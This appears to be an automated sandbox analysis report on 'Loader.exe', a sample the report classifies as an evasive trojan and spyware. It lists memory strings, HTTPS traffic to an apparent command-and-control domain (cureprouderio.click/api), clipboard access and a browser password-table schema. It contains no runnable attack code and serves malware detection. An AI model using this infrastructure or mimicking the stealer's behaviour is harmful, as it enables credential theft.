                Source: Loader.exeString found in binary or memory: http://ocsp.digicert.com0
                Source: Loader.exeString found in binary or memory: http://ocsp.digicert.com0A
                Source: Loader.exeString found in binary or memory: http://ocsp.entrust.net02
                Source: Loader.exeString found in binary or memory: http://ocsp.entrust.net03
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Loader.exeString found in binary or memory: http://www.digicert.com/CPS0
                Source: Loader.exeString found in binary or memory: http://www.entrust.net/rpa03
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Loader.exe, 00000003.00000003.2234239277.0000000002C56000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.clic
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2234117510.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235035160.0000000002C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/
                Source: Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/6CB
                Source: Loader.exe, 00000003.00000003.2145796817.0000000005365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/8D7Qw/Wo
                Source: Loader.exe, 00000003.00000003.2145695820.0000000005365000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145765606.0000000005365000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/8D7Qw/WoB
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/;0
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/_0
                Source: Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171228984.0000000002C7B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177047912.0000000002C6E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171055409.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189727332.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2120544884.0000000005362000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235106849.0000000002C79000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177156351.0000000002C8F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171213877.0000000002C6E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2120867299.0000000005364000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2171228984.0000000002C8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/api
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/api)
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/api9
                Source: Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/apiprog
                Source: Loader.exe, 00000003.00000003.2234239277.0000000002C6D000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000002.2235053404.0000000002C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/apiwn
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/c
                Source: Loader.exe, 00000003.00000003.2177156351.0000000002C7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/pi
                Source: Loader.exe, 00000003.00000003.2074388190.0000000002C17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click/piD0S
                Source: Loader.exe, 00000003.00000003.2189776264.0000000002C7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cureprouderio.click:443/api
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Loader.exe, 00000003.00000002.2235463947.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2170956786.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2189552535.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145879555.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2177005335.000000000535A000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2145718381.000000000535A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Loader.exe, 00000003.00000003.2122401956.000000000535C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Loader.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: Loader.exe, 00000003.00000003.2075165390.000000000530C000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075215248.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075279705.0000000005309000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Loader.exe, 00000003.00000003.2121974309.00000000055F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49718 version: TLS 1.2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00433500 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,3_2_00433500
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A610000_2_00A61000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A6F5550_2_00A6F555
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A877920_2_00A87792
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A79CC00_2_00A79CC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A85C5E0_2_00A85C5E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00A73FB20_2_00A73FB2
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004098CE3_2_004098CE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004230D33_2_004230D3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004260903_2_00426090
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040D11B3_2_0040D11B
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C98C3_2_0042C98C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043DBAC3_2_0043DBAC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004094003_2_00409400
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004384B03_2_004384B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041052C3_2_0041052C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043FEF03_2_0043FEF0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004407703_2_00440770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004387D03_2_004387D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004290703_2_00429070
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004090003_2_00409000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004280003_2_00428000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C0C03_2_0041C0C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004058D03_2_004058D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004038D03_2_004038D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004237503_2_00423750
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043E8A73_2_0043E8A7
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042A9503_2_0042A950
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042217D3_2_0042217D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041C9203_2_0041C920
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004301D53_2_004301D5
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004239E03_2_004239E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004391E13_2_004391E1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004081803_2_00408180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004061803_2_00406180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004401803_2_00440180
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041E9903_2_0041E990
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041A1903_2_0041A190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004191903_2_00419190
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041B9A03_2_0041B9A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004182413_2_00418241
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041FA743_2_0041FA74
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00430A783_2_00430A78
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004172073_2_00417207
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004332103_2_00433210
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00428A313_2_00428A31
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415A3C3_2_00415A3C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042C2C13_2_0042C2C1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004042803_2_00404280
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004142A03_2_004142A0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417AB83_2_00417AB8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00423B403_2_00423B40
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D3503_2_0041D350
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00421B003_2_00421B00
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D3063_2_0042D306
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00411BC03_2_00411BC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004163C03_2_004163C0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004393D03_2_004393D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004383D03_2_004383D0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004073F03_2_004073F0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D3F13_2_0042D3F1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004253803_2_00425380
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F3803_2_0043F380
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00422B843_2_00422B84
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041CB903_2_0041CB90
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042D3913_2_0042D391
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00422BA03_2_00422BA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00404BB03_2_00404BB0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004404503_2_00440450
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042B46E3_2_0042B46E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00436C7D3_2_00436C7D
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004264303_2_00426430
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042B4353_2_0042B435
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00418CE13_2_00418CE1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00439C8E3_2_00439C8E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F4903_2_0043F490
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040CC993_2_0040CC99
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040E49F3_2_0040E49F
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004374A33_2_004374A3
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00427D523_2_00427D52
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042856C3_2_0042856C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004155063_2_00415506
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004275273_2_00427527
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043EDCE3_2_0043EDCE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F5E03_2_0043F5E0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00437D803_2_00437D80
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041D5B03_2_0041D5B0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004066103_2_00406610
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042E6173_2_0042E617
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00405E203_2_00405E20
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00427E223_2_00427E22
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004286303_2_00428630
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004306373_2_00430637
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004266393_2_00426639
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00402ED03_2_00402ED0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00417EEE3_2_00417EEE
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F6903_2_0043F690
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00415E9A3_2_00415E9A
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00414EA03_2_00414EA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040F6AA3_2_0040F6AA
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0042774C3_2_0042774C
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004237503_2_00423750
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004217703_2_00421770
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040AF233_2_0040AF23
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043F7303_2_0043F730
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0043C7303_2_0043C730
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00410FC83_2_00410FC8
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00426FD03_2_00426FD0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00437FE03_2_00437FE0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0040A7803_2_0040A780
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_0041CFA03_2_0041CFA0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004257AC3_2_004257AC
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A610003_2_00A61000
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A6F5553_2_00A6F555
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A877923_2_00A87792
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A79CC03_2_00A79CC0
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A85C5E3_2_00A85C5E
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_00A73FB23_2_00A73FB2
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00A6FA60 appears 100 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00A7CFD6 appears 40 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00A6FAE4 appears 34 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00407F80 appears 48 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00A780F8 appears 42 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00A70730 appears 38 times
                Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00414290 appears 76 times
                Source: Loader.exeStatic PE information: invalid certificate
                Source: Loader.exe, 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
                Source: Loader.exe, 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
                Source: Loader.exe, 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
                Source: Loader.exe, 00000003.00000003.2027261292.0000000002B32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
                Source: Loader.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
                Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Loader.exeStatic PE information: Section: .bss ZLIB complexity 1.0003249845551894
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@1/1
                Source: C:\Users\user\Desktop\Loader.exeCode function: 3_2_004387D0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_004387D0
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4440:120:WilError_03
                Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Loader.exe, 00000003.00000003.2075933403.00000000052DA000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2098464912.00000000052D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2075806185.00000000052F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Loader.exeVirustotal: Detection: 40%
                Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
                Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
